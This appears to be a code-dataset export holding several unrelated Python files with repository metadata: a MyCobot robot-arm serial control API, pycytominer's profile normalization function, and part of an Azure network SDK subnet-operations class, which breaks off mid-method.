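    def run(self, new_event, cloners, shared_data, event_exists=False):
        with db.session.no_autoflush:
            new_event.keywords = list(self.old_event.keywords)
        db.session.flush()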
| 39.786127
| 120
| 0.687346
|
67a1477652e9846e6503371dd1973d6cf79cdccc
| 10,950
|
py
|
Python
|
mycobot/src/mycobot/mycobot3.py
|
grassjelly/mycobot
|
b6df141dd910de85c6588afbda456bc0f60636c7
|
[
"BSD-3-Clause"
] | 9
|
2021-01-24T13:30:32.000Z
|
2021-05-29T01:09:38.000Z
|
mycobot/src/mycobot/mycobot3.py
|
grassjelly/mycobot
|
b6df141dd910de85c6588afbda456bc0f60636c7
|
[
"BSD-3-Clause"
] | null | null | null |
mycobot/src/mycobot/mycobot3.py
|
grassjelly/mycobot
|
b6df141dd910de85c6588afbda456bc0f60636c7
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
sys.path.append('.')
import time, serial, struct
class MyCobot():
'''MyCobot Python API
Provided methods:
power_on() :
power_off() :
get_angles() :
get_angles_of_radian() :
send_angle() :
send_angles() :
send_angles_by_radian() :
set_color() :
get_coords() :
send_coords() :
jog_angle() :
jog_coord() :
jog_stop() :
is_moving() :
pause() :
resume() :
stop() :
is_paused() :
get_speed() :
set_speed() :
'''
def __init__(self, port):
# _prot = subprocess.run(['echo -n /dev/ttyUSB*'],
# stdout=subprocess.PIPE,
# shell=True).stdout.decode('utf-8')
_port = port
_baudrate = '115200'
_timeout = 0.1
for _ in range(5):
try:
self.serial_port = serial.Serial(_port, _baudrate, timeout=_timeout)
break
except Exception as e:
print(e)
time.sleep(5)
continue
else:
print('Connecting to port failed, exiting.')
exit(0)
def power_on(self):
self._write('fefe0210fa')
def power_off(self):
self._write('fefe0211fa')
def set_free_mode(self):
self._write('fefe0213fa')
def get_angles(self):
'''Get all angles and return a list
Return:
data_list (list):
'''
command = 'fefe0220fa'
self._write(command)
if self.serial_port.inWaiting() > 0:
data = self._read()
data_list = self._parse_data(data, 'get_angles')
return data_list
else:
return []
def get_angles_of_radian(self):
'''Get all angles and return a list
Return:
data_list (list):
'''
command = 'fefe0220fa'
self._write(command)
if self.serial_port.inWaiting() > 0:
data = self._read()
data_list = self._parse_data(data, 'get_angles_of_radian')
return data_list
else:
return []
def send_angle(self, id, degree, speed):
'''Send one angle
Args:
id (common.Angle):
degree (int):
speed (int): 0 ~100
'''
_hex = self._angle_to_hex(degree)
speed = self._complement_zero(hex(speed)[2:], digit=2)
command = 'fefe0621{}{}{}fa'.format(id, _hex, speed)
# print(command)
self._write(command)
def send_angles(self, degrees, speed):
'''Send all angles
Args:
degrees (list): example [0, 0, 0, 0, 0, 0]
speed (int): 0 ~ 100
'''
if len(degrees) != 6:
print('The length of degrees is not right')
return
command = 'fefe0f22'
speed = self._complement_zero(hex(speed)[2:], digit=2)
for degree in degrees:
_hex = self._angle_to_hex(degree)
# print(_hex)
command += _hex
command += '{}fa'.format(speed)
# print(command)
self._write(command)
def send_angles_by_radian(self, radians, speed):
'''Send all angles
Args:
degrees (list): example [0, 0, 0, 0, 0, 0]
speed (int): 0 ~ 100
'''
if len(radians) != 6:
print('The length of degrees is not right')
return
command = 'fefe0f22'
speed = self._complement_zero(hex(speed)[2:], digit=2)
for radian in radians:
# print(radian)
_hex = self._angle_to_hex(radian, is_degree=False)
# print(_hex)
command += _hex
command += '{}fa'.format(speed)
# print(command)
self._write(command)
def get_coords(self):
'''Get all coords.
Return:
data_list (list): [x, y, z, rx, ry, rz] (mm)
'''
command = 'fefe0223fa'
self._write(command)
if self.serial_port.inWaiting() > 0:
data = self._read()
data_list = self._parse_data(data, 'get_coords')
return data_list
else:
return []
def send_coord(self, id, coord, speed):
'''Send one coord
Args:
id(common.Coord):
coord(float):
speed(int):
'''
command = 'fefe0624'
command += id
command += self._coord_to_hex(coord)
command += self._complement_zero(hex(int(speed))[2:], digit=2)
# print(command)
self._write(command)
def send_coords(self, coords, speed, mode):
'''Send all coords
Args:
coords: [x, y, z, rx, ry, rz]
speed(int);
mode(int): 0 - angluar, 1 - linear
'''
if len(coords) != 6:
print('The length of coords is not right')
return
command = 'fefe1025 '
speed = hex(speed)[2:]
speed = self._complement_zero(speed, digit=2)
mode = self._complement_zero(hex(mode)[2:], digit=2)
for coord in coords:
_hex = self._coord_to_hex(coord)
command += (_hex + ' ')
command += '{}{}fa'.format(speed, mode)
# print(command)
self._write(command)
def jog_angle(self, joint_id, direction, speed):
'''Joint control
joint_id: string
direction: int [0, 1]
speed: int (0 - 100)
'''
command = 'fefe0530'
direction = hex(direction)[2:]
direction = self._complement_zero(direction, digit=2)
speed = hex(speed)[2:]
speed = self._complement_zero(speed, digit=2)
command += '{}{}{}fa'.format(joint_id, direction, speed)
self._write(command)
def jog_coord(self, coord, direction, speed):
'''Coord control
coord: string
direction: int [0, 1]
speed: int (0 - 100)
'''
command = 'fefe0532'
direction = hex(direction)[2:]
direction = self._complement_zero(direction, digit=2)
speed = hex(speed)[2:]
speed = self._complement_zero(speed, digit=2)
command += '{}{}{}fa'.format(coord, direction, speed)
self._write(command)
def jog_stop(self):
self._write('fefe0234fa')
def is_servo_enable(self):
pass
def is_all_servo_enable(self):
pass
def set_color(self, rgb):
'''Set the light color
Args:
rgs (str): example 'ff0000'
'''
command = 'fe fe 05 6a {} fa'.format(rgb)
# print(command)
self._write(command)
def is_moving(self):
command = 'fe fe 02 2b fa'
self._write(command)
data = self._read(2)
# print(data)
if not data:
return True
flag = int(data.hex(), 16)
if flag:
return True
else:
return False
def pause(self):
self._write('fe fe 02 26 fa')
def resume(self):
self._write('fe fe 02 28 fa')
def stop(self):
self._write('fe fe 02 29 fa')
def is_paused(self):
self._write('fe fe 02 27 fa')
data = self._read()
flag = int(data.hex(), 16)
return False if flag else True
def is_in_position(self, coords):
if len(coords) != 6:
print('The length of coords is not right')
return
command = 'fe fe 0d 2a '
for coord in coords:
_hex = self._coord_to_hex(coord)
command += (_hex + ' ')
command += 'fa'
# print(command)
self._write(command)
data = self._read()
flag = int(data.hex(), 16)
return False if flag else True
def get_speed(self):
self._write('fe fe 02 40 fa')
data = self._read()
if data:
return int(data.hex(), 16)
def set_speed(self, speed):
'''Set speed value
Args:
speed (int): 0 - 100
'''
speed = int(speed)
if not 0 <= speed <= 100:
raise Exception('speed value out of range (0 ~ 100)')
_hex = str(hex(speed))[2:]
self._write('fe fe 03 41 {} fa'.format(_hex))
def _parse_data(self, data, name):
data_list = []
data = data.hex()
data = data[-28:]
if not (data.startswith('20') and data.endswith('fa')):
return []
if name == 'get_angles':
data = data[-26:-2]
for i in range(6):
_hex = data[i * 4: (i * 4) + 4]
degree = self._hex_to_degree(_hex)
data_list.append(degree)
elif name == 'get_coords':
data = data[-26:-2]
for i in range(6):
_hex = data[i * 4: (i * 4) + 4]
_coord = self._hex_to_int(_hex) / 10.0
data_list.append(_coord)
elif name == 'get_angles_of_radian':
data = data[-26:-2]
for i in range(6):
_hex = data[i * 4: (i * 4) + 4]
_radian = self._hex_to_int(_hex) / 1000.0
data_list.append(_radian)
return (data_list)
def _hex_to_degree(self, _hex: str):
_int = self._hex_to_int(_hex)
return _int * 18 / 314
def _hex_to_int(self, _hex: str):
_int = int(_hex, 16)
if _int > 0x8000:
_int -= 0x10000
return _int
def _angle_to_hex(self, _degree: float, is_degree=True):
if is_degree:
radian = (_degree * (3140 / 180))
else:
radian = _degree * 1000
radian = int(radian)
if radian < 0:
radian += 0x10000
radian = round(radian)
s = str(hex(radian))[2:]
s = self._complement_zero(s)
return s
def _coord_to_hex(self, coord):
coord *= 10
coord = int(coord)
if coord < 0:
coord += 0x10000
s = str(hex(coord))[2:]
s = self._complement_zero(s)
return s
def _complement_zero(self, s, digit=4):
s_len = len(s)
if s_len == digit:
return s
need_len = digit - s_len
s = ''.join(['0' for _ in range(need_len)] + [s])
return s
def _write(self, data: str):
# print(data)
data = bytes.fromhex(data)
self.serial_port.write(data)
time.sleep(0.05)
    def _read(self, size: int = 1024):
data = self.serial_port.read(size)
return data
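# --- Hedged usage sketch (not part of the original file) ---------------------
# A minimal, standalone illustration of the frame encoding performed by
# send_angles_by_radian/_angle_to_hex/_complement_zero above: a 'fefe0f22'
# header, six 4-hex-digit values (radian * 1000, two's complement for negative
# values), a 2-hex-digit speed and the 'fa' terminator. The helper names below
# are hypothetical re-implementations for illustration only; they build the hex
# string without opening a serial port.
def _pad_hex(s, digit=4):
    return s.rjust(digit, '0')
def _radian_to_hex(radian):
    value = int(radian * 1000)
    if value < 0:
        value += 0x10000
    return _pad_hex(hex(value)[2:])
def build_send_radians_frame(radians, speed):
    frame = 'fefe0f22'
    for radian in radians:
        frame += _radian_to_hex(radian)
    return frame + _pad_hex(hex(int(speed))[2:], digit=2) + 'fa'
# Example: build_send_radians_frame([0, 0, 0, 0, 0, 0], 50)
# returns 'fefe0f22' + '0000' * 6 + '32fa', which bytes.fromhex() accepts.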
| 27.512563
| 84
| 0.489863
|
1b4bc775b2b1b9241b1b73f8188150e9c787496b
| 3,846
|
py
|
Python
|
pycytominer/normalize.py
|
hillsbury/pycytominer
|
02ed6647a0913e9f0b28cbafa97766d55eeffd20
|
[
"BSD-3-Clause"
] | null | null | null |
pycytominer/normalize.py
|
hillsbury/pycytominer
|
02ed6647a0913e9f0b28cbafa97766d55eeffd20
|
[
"BSD-3-Clause"
] | null | null | null |
pycytominer/normalize.py
|
hillsbury/pycytominer
|
02ed6647a0913e9f0b28cbafa97766d55eeffd20
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Normalize observation features based on specified normalization method
"""
import pandas as pd
from sklearn.preprocessing import StandardScaler, RobustScaler
from pycytominer.cyto_utils import (
output,
infer_cp_features,
load_profiles,
)
from pycytominer.operations import Whiten, RobustMAD
def normalize(
profiles,
features="infer",
meta_features="infer",
samples="all",
method="standardize",
output_file="none",
compression=None,
float_format=None,
whiten_center=True,
whiten_method="ZCA",
):
"""
Normalize features
Arguments:
profiles - either pandas DataFrame or a file that stores profile data
features - list of cell painting features [default: "infer"]
if "infer", then assume cell painting features are those that do not
start with "Cells", "Nuclei", or "Cytoplasm"
meta_features - if specified, then output these with specified features
[default: "infer"]
    samples - string indicating which metadata column and values to use to subset
        the data when fitting the scaler; control samples are often used here [default: 'all']
the format of this variable will be used in a pd.query() function. An
example is "Metadata_treatment == 'control'" (include all quotes)
method - string indicating how the dataframe will be normalized
[default: 'standardize']
    output_file - [default: "none"] if provided, will write normalized profiles to file;
        if not specified, will return the normalized profiles. We recommend
        that this output file be suffixed with "_normalized.csv".
compression - the mechanism to compress [default: None]
float_format - decimal precision to use in writing output file [default: None]
For example, use "%.3g" for 3 decimal precision.
whiten_center - if data should be centered before whitening transform [default: True]
(only used if method = "whiten")
whiten_method - the type of whitening normalization used [default: 'ZCA']
(only used if method = "whiten")
Return:
A normalized DataFrame
"""
# Load Data
profiles = load_profiles(profiles)
# Define which scaler to use
method = method.lower()
avail_methods = ["standardize", "robustize", "mad_robustize", "whiten"]
    assert method in avail_methods, "operation must be one of {}".format(avail_methods)
if method == "standardize":
scaler = StandardScaler()
elif method == "robustize":
scaler = RobustScaler()
elif method == "mad_robustize":
scaler = RobustMAD()
elif method == "whiten":
scaler = Whiten(center=whiten_center, method=whiten_method)
if features == "infer":
features = infer_cp_features(profiles)
# Separate out the features and meta
feature_df = profiles.loc[:, features]
if meta_features == "infer":
meta_features = infer_cp_features(profiles, metadata=True)
meta_df = profiles.loc[:, meta_features]
# Fit the sklearn scaler
if samples == "all":
fitted_scaler = scaler.fit(feature_df)
else:
# Subset to only the features measured in the sample query
fitted_scaler = scaler.fit(profiles.query(samples).loc[:, features])
# Scale the feature dataframe
feature_df = pd.DataFrame(
fitted_scaler.transform(feature_df),
columns=feature_df.columns,
index=feature_df.index,
)
normalized = meta_df.merge(feature_df, left_index=True, right_index=True)
if output_file != "none":
output(
df=normalized,
output_filename=output_file,
compression=compression,
float_format=float_format,
)
else:
return normalized
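# --- Hedged usage sketch (not part of the original file) ---------------------
# A minimal example of calling normalize() with explicit feature and metadata
# column lists (so nothing depends on feature inference). The column names and
# values below are made up for illustration.
if __name__ == "__main__":
    example = pd.DataFrame(
        {
            "Metadata_Well": ["A01", "A02", "A03", "A04"],
            "Metadata_treatment": ["control", "control", "drug", "drug"],
            "Cells_AreaShape_Area": [100.0, 120.0, 150.0, 90.0],
            "Nuclei_Intensity_Mean": [0.5, 0.7, 0.9, 0.4],
        }
    )
    normalized_df = normalize(
        profiles=example,
        features=["Cells_AreaShape_Area", "Nuclei_Intensity_Mean"],
        meta_features=["Metadata_Well", "Metadata_treatment"],
        samples="Metadata_treatment == 'control'",
        method="standardize",
    )
    print(normalized_df)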
| 34.339286
| 89
| 0.658346
|
c96a2e5e8e6a104e7893d4f63d3d658de101e346
| 35,800
|
py
|
Python
|
src/azure-firewall/azext_firewall/vendored_sdks/v2020_07_01/v2020_07_01/operations/_subnets_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/azure-firewall/azext_firewall/vendored_sdks/v2020_07_01/v2020_07_01/operations/_subnets_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/azure-firewall/azext_firewall/vendored_sdks/v2020_07_01/v2020_07_01/operations/_subnets_operations.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class SubnetsOperations(object):
"""SubnetsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified subnet.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.Subnet"
"""Gets the specified subnet by virtual network and resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Subnet, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_07_01.models.Subnet
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subnet"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Subnet', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
subnet_parameters, # type: "_models.Subnet"
**kwargs # type: Any
):
# type: (...) -> "_models.Subnet"
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subnet"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(subnet_parameters, 'Subnet')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Subnet', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('Subnet', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
subnet_parameters, # type: "_models.Subnet"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.Subnet"]
"""Creates or updates a subnet in the specified virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param subnet_parameters: Parameters supplied to the create or update subnet operation.
:type subnet_parameters: ~azure.mgmt.network.v2020_07_01.models.Subnet
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either Subnet or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_07_01.models.Subnet]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subnet"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
subnet_parameters=subnet_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('Subnet', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}'} # type: ignore
def _prepare_network_policies_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
prepare_network_policies_request_parameters, # type: "_models.PrepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._prepare_network_policies_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subnetName': self._serialize.url("subnet_name", subnet_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(prepare_network_policies_request_parameters, 'PrepareNetworkPoliciesRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_prepare_network_policies_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/subnets/{subnetName}/PrepareNetworkPolicies'} # type: ignore
def begin_prepare_network_policies(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
subnet_name, # type: str
prepare_network_policies_request_parameters, # type: "_models.PrepareNetworkPoliciesRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Prepares a subnet by applying network intent policies.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param subnet_name: The name of the subnet.
:type subnet_name: str
:param prepare_network_policies_request_parameters: Parameters supplied to prepare subnet by
applying network intent policies.
:type prepare_network_policies_request_parameters: ~azure.mgmt.network.v2020_07_01.models.PrepareNetworkPoliciesRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._prepare_network_policies_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
subnet_name=subnet_name,
prepare_network_policies_request_parameters=prepare_network_policies_request_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
